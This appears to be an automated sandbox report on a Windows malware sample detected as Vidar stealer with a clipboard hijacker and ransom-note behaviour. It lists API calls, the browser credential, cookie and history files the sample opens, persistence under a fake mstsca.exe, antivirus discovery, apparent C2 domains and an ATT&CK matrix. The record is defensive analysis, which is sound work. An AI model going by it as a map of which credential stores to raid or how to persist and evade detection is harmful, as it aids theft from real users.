            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeProcess created: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe --Task
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_05DE80F6 cpuid 0_2_05DE80F6
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_05DF3F87
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_05DF49EA
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_05DF394D
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_05DEC8B7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_05E00AB6
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: EnumSystemLocalesW,2_2_004387C8
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: GetLocaleInfoW,2_2_0043884E
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: EnumSystemLocalesW,2_2_00437E27
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,2_2_0042BF17
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,5_2_05E13F87
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,5_2_05E149EA
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,5_2_05E1394D
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,5_2_05E0C8B7
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_05E20AB6
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_05DF3F87
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,7_2_05DF49EA
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,7_2_05DF394D
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,7_2_05DEC8B7
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_05E00AB6
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 0_2_00408AE4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00408AE4
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Clipboard Hijacker
            Source: Yara matchFile source: 40.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 22.2.build3.exe.9815a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.mstsca.exe.8915a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 41.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 33.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.2.build3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000016.00000002.1457447883.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000029.00000002.2120641032.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.1459562254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.1577090127.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.2121223702.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.3674124783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Yara detected Vidar stealer
            Source: Yara matchFile source: 18.2.build2.exe.35415a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.35415a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1515252770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7524, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.jsonJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4Jump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.jsonJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.jsonJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.jsonJump to behavior
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txtJump to behavior
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Vidar stealer
            Source: Yara matchFile source: 18.2.build2.exe.35415a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 18.2.build2.exe.35415a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000012.00000002.1332847113.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1515252770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7524, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		2
            System Time Discovery            		1
            Taint Shared Content            		11
            Archive Collected Data            		12
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium2
            Data Encrypted for Impact
            CredentialsDomainsDefault Accounts2
            Native API            		1
            Scheduled Task/Job            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		211
            Process Injection            		2
            Software Packing            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Screen Capture            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job            		1
            Services File Permissions Weakness            		1
            Scheduled Task/Job            		1
            DLL Side-Loading            		NTDS44
            System Information Discovery            		Distributed Component Object ModelInput Capture124
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder            		1
            Masquerading            		LSA Secrets1
            Query Registry            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
            Services File Permissions Weakness            		21
            Virtualization/Sandbox Evasion            		Cached Domain Credentials251
            Security Software Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
            Process Injection            		DCSync21
            Virtualization/Sandbox Evasion            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Services File Permissions Weakness            		Proc Filesystem2
            Process Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Application Window Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Owner/User Discovery            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
            System Network Configuration Discovery            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431076 Sample: qJKiVKZdFk.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 93 sdfjhuz.com 2->93 95 cajgtus.com 2->95 97 2 other IPs or domains 2->97 113 Snort IDS alert for network traffic 2->113 115 Found malware configuration 2->115 117 Malicious sample detected (through community Yara rule) 2->117 119 12 other signatures 2->119 13 qJKiVKZdFk.exe 2->13         started        16 qJKiVKZdFk.exe 2->16         started        18 mstsca.exe 2->18         started        20 5 other processes 2->20 signatures3 process4 signatures5 139 Detected unpacking (changes PE section rights) 13->139 141 Detected unpacking (overwrites its own PE header) 13->141 143 Writes a notice file (html or txt) to demand a ransom 13->143 149 2 other signatures 13->149 22 qJKiVKZdFk.exe 1 16 13->22         started        145 Multi AV Scanner detection for dropped file 16->145 147 Injects a PE file into a foreign processes 16->147 26 qJKiVKZdFk.exe 16->26         started        29 mstsca.exe 18->29         started        31 qJKiVKZdFk.exe 20->31         started        33 qJKiVKZdFk.exe 20->33         started        35 qJKiVKZdFk.exe 